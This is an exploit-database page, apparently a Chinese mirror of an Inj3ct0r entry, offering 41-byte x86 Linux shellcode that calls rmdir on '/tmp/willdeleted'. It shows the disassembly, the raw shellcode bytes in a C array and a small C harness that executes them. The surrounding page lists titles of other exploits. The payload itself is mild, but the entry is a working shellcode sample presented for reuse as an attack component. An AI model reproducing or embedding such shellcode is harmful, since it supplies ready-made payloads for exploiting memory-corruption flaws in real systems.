41 bytes sys_rmdir("/tmp/willdeleted") x86 linux shellcode

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

41 bytes sys_rmdir("/tmp/willdeleted") x86 linux shellcode

来源：devilzc0de.com 作者：gunslinger_ 发布时间：2010-06-01

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __ /'__`\        /\ \__ /'__`\                   0
0 /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \ _ ___           1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0 [+] Site            : Inj3ct0r.com                                  0
1 [+] Support e-mail : submit[at]inj3ct0r.com                        1
0                                                                      0
1               #########################################              1
0               I'm gunslinger_ member from Inj3ct0r Team              1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

/*
Name   : 41 bytes sys_rmdir("/tmp/willdeleted") x86 linux shellcode
Date   : may, 31 2010
Author : gunslinger_
Web    : devilzc0de.com
blog   : gunslingerc0de.wordpress.com
tested on : linux debian
*/

root@localhost:/home/gunslinger/shellcode# objdump -d rmdir

rmdir: file format elf32-i386

Disassembly of section .text:

08048060 <.text>:
8048060: eb 11                jmp    0x8048073
8048062: 31 c0                xor    %eax,%eax
8048064: b0 28                mov    $0x28,%al
8048066: 31 db                xor    %ebx,%ebx
8048068: 5b                   pop    %ebx
8048069: cd 80                int    $0x80
804806b: 31 c0                xor    %eax,%eax
804806d: b0 01                mov    $0x1,%al
804806f: 31 db                xor    %ebx,%ebx
8048071: cd 80                int    $0x80
8048073: e8 ea ff ff ff       call   0x8048062
8048078: 2f                   das
8048079: 74 6d                je     0x80480e8
804807b: 70 2f                jo     0x80480ac
804807d: 77 69                ja     0x80480e8
804807f: 6c                   insb   (%dx),%es:(%edi)
8048080: 6c                   insb   (%dx),%es:(%edi)
8048081: 64                   fs
8048082: 65                   gs
8048083: 6c                   insb   (%dx),%es:(%edi)
8048084: 65                   gs
8048085: 74 65                je     0x80480ec
8048087: 64                   fs
root@localhost:/home/gunslinger/shellcode#
*/

#include <stdio.h>

char pussy[] = "\xeb\x11\x31\xc0\xb0\x28\x31"
  "\xdb\x5b\xcd\x80\x31\xc0\xb0"
  "\x01\x31\xdb\xcd\x80\xe8\xea"
  "\xff\xff\xff\x2f\x74\x6d\x70"
  "\x2f\x77\x69\x6c\x6c\x64\x65"
  "\x6c\x74\x65\x74\x65\x64";

int main(void)
{
(*(void(*)()) pussy)();

return 0;
}

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告